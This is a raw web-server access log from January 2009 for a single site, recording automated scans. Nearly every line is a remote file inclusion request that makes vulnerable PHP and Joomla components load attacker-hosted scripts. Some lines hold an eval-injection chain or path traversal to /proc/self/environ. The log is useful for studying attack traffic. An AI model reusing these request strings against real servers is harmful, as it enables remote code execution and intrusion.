216.239.0.245 - - [04/Jan/2009:16:53:37 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
78.111.80.24 - - [04/Jan/2009:16:54:15 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.111.80.24 - - [04/Jan/2009:16:54:16 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:16:56:31 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:56:42 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:56:43 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:56:49 -0800] "GET /logs/access_080908.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:56:50 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:56:50 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:57:05 -0800] "GET /logs///components/com_simpleboard/image_upload.php?sbp=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.214.53.78 - - [04/Jan/2009:16:57:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:16:57:11 -0800] "GET /logs/access_081208.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:16:57:11 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:16:57:11 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:57:22 -0800] "GET /logs/access_081208.log///components/com_performs/performs.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:57:22 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
85.233.166.227 - - [04/Jan/2009:16:57:23 -0800] "GET /logs///components/com_performs/performs.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
62.48.219.29 - - [04/Jan/2009:16:57:41 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:59:27 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:59:27 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
69.73.129.216 - - [04/Jan/2009:16:59:27 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:16:59:27 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:16:59:27 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:16:59:27 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:16:59:39 -0800] "GET /logs/access_081208.log/?sourcedir=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:16:59:39 -0800] "GET /?sourcedir=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.142.214.201 - - [04/Jan/2009:16:59:39 -0800] "GET /logs/?sourcedir=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 200 2654 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.7.216.240 - - [04/Jan/2009:16:59:49 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
62.48.219.29 - - [04/Jan/2009:17:00:15 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:01:02 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:01:34 -0800] "GET /logs/access_080915.log//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:01:35 -0800] "GET /config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:01:35 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:02:38 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:02:38 -0800] "GET /config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:17:02:46 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:17:02:46 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
200.199.205.47 - - [04/Jan/2009:17:02:47 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:03:04 -0800] "GET /main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:03:04 -0800] "GET /logs/access_080915.log//main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:03:04 -0800] "GET /logs/access_080901.log//main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:03:04 -0800] "GET /logs//main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
83.222.23.200 - - [04/Jan/2009:17:03:58 -0800] "GET /logs/access_081020.log///config.php?path_to_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.199.205.47 - - [04/Jan/2009:17:04:05 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:04:19 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:04:19 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:04:19 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:04:57 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:17:05:07 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:05:18 -0800] "GET /logs/access_081013.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:05:19 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:05:19 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:05:52 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:05:53 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:05:53 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:05:59 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:05:59 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:05:59 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:06:05 -0800] "GET /logs/access.log//main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
41.250.251.52 - - [04/Jan/2009:17:06:18 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:17:06:26 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:07:50 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:08:07 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
65.39.182.49 - - [04/Jan/2009:17:09:19 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
65.39.182.49 - - [04/Jan/2009:17:09:19 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:17:10:27 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:17:10:27 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:17:10:27 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:10:33 -0800] "GET /logs/access_081013.log///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:10:33 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:10:34 -0800] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:11:01 -0800] "GET /logs/access_080908.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:11:01 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:11:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
211.194.5.172 - - [04/Jan/2009:17:12:19 -0800] "GET /logs/access_080908.log/[Scripthttp://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.194.5.172 - - [04/Jan/2009:17:12:20 -0800] "GET /[Scripthttp://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.194.5.172 - - [04/Jan/2009:17:12:21 -0800] "GET /logs/[Scripthttp://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:13:41 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:13:42 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:13:42 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:14:37 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
208.98.1.107 - - [04/Jan/2009:17:15:43 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:15:50 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:15:51 -0800] "GET /config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.42.108 - - [04/Jan/2009:17:15:51 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:57 -0800] "GET /principal.php?conteudo=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:57 -0800] "GET /logs/principal.php?conteudo=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:57 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:57 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:58 -0800] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:58 -0800] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:58 -0800] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
200.161.5.60 - - [04/Jan/2009:17:16:58 -0800] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:18:47 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:18:47 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:18:48 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:18:48 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
221.143.46.163 - - [04/Jan/2009:17:19:04 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
221.143.46.163 - - [04/Jan/2009:17:19:05 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:17:20:12 -0800] "GET /logs/access_081208.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:17:20:28 -0800] "GET /logs/access_081222.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
77.222.40.234 - - [04/Jan/2009:17:22:09 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
